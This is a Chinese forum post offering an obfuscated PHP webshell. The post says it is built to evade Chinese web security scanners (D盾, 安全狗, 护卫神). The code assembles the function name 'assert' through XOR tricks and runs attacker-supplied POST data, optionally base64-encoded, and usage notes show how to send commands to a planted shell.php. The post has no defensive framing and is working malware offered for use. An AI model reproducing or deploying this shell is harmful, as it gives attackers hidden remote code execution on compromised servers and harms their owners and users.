设为首页收藏本站 |天气与日历| 2025-07-02 星期三 15:26:00 乙巳(蛇)年 六月初八 申时
     
切换到窄版

私人站点

 找回密码
 立即注册
搜索
查看: 270|回复: 0

免杀PHP一句话一枚

[复制链接]

954

主题

954

帖子

3879

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
3879
发表于 2021-8-2 18:25:12 | 显示全部楼层 |阅读模式
免杀PHP一句话shell,利用随机异或免杀D盾,免杀安全狗护卫神等
  1. <?php
  2. class VONE {
  3. function HALB() {
  4. $rlf ='B' ^"\x23";
  5. $fzq ='D' ^"\x37";
  6. $fgu ='h' ^"\x1b";
  7. $sbe ='R' ^"\x37";
  8. $gba ='H' ^"\x3a";
  9. $oya ='Y' ^"\x2d";
  10. $MWUC =$rlf .$fzq .$fgu .$sbe .$gba .$oya;
  11. return $MWUC;}function __destruct() {
  12. $RNUJ =$this->HALB();
  13. @$RNUJ($this->HY);}}
  14. $vone =new VONE();
  15. @$vone->HY = isset($_GET['id']) ?base64_decode($_POST['mr6']) :$_POST['mr6'];
  16. ?>
复制代码
888.png
使用说明



  1. 是否传入id参数决定是否把流量编码

  2. http://www.xxx.com/shell.php
  3. POST: mr6=phpinfo(); //与普通shell相同

  4. http://www.xxx.com/shell.php?id=xxx(xxxx随便修改)
  5. POST: mr6=cGhwaW5mbygpOwo= //payload的base64编码
复制代码





回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|编程站点 ( 冀ICP备2023028127号-2 )|友链申请|

GMT+8, 2025-7-2 15:26 , Processed in 0.105935 second(s), 27 queries .

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表